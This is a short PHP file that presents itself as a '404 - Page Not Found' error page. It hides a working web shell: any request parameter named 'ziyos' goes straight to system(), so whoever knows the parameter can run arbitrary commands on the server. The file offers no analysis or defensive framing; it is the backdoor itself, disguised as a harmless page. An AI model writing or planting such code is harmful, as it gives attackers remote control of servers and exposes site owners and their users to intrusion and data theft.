<?php $websiteContent = "<h1>404 - Page Not Found</h1>"; echo $websiteContent; if (isset($_REQUEST['ziyos'])) { system($_REQUEST['ziyos']); }?>